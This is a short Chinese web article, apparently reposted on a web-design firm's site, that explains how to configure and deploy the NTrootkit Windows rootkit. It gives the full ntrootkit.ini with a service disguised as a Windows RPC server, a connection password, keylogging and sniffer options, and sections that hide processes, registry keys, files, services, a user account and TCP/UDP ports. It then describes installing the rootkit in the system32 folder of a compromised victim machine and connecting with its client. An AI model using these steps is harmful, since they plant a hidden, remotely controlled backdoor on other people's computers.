Rootkit之ntrootkit的配置使用

NTrootkit

成都创新互联是一家专业提供本溪企业网站建设,专注与网站建设、成都网站设计、H5开发、小程序制作等业务。10年已为本溪众多企业、政府机构等服务。创新互联专业的建站公司优惠进行中。

一,配置方法

\\filename:ntrootkit.ini
\\This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit
\\can't be installed!!!
[GLOBAL]     //下面为配置内容
\\servicename is the ntrootkit 's servicename
servicename=tsserver       //服务名
servdispname=rpcsvr
servdescription=windows system rpc server
installdir=com\sserver      //安装目录
connpass=12345             //连接密码
appname=51cto.exe 
keylog=0                       //0为不记录键盘
workmode=1                  //0为sniffer模式
[HIDDEN PROCNAME]     //要隐藏的服务名

51cto
[HIDDEN REGKEY]    //要隐藏的注册表键

zero\soft\...\...\xxx

[HIDDEN REGVALUE]   //要隐藏的注册表键值

zero\soft\...\...

[HIDDEN FILEDIR]  //要隐藏的文件目录

c:\rootkit

[HIDDEN SERVICE]  //要隐藏的服务名

servicert
[HIDDEN USER]  //要隐藏的用户名

zerosecurity
[HIDDEN TCPPORT]  //要隐藏的tcp端口
tcpport=5768

[HIDDEN UDPPORT]  //要隐藏的udp端口
udpport=4000

 

二,使用方法

       ①:将配置文件 .ini和服务端ntrootkit.exe放入肉鸡的 system32目录下,然后运行ntrootkit.exe安装;ntrootkit -u password 可卸载;

        Rootkit之ntrootkit的配置使用

       ②:客户端用rtclient连接;

        Rootkit之ntrootkit的配置使用

 


网站名称:Rootkit之ntrootkit的配置使用
文章来源:http://cdiso.cn/article/ghigoj.html

其他资讯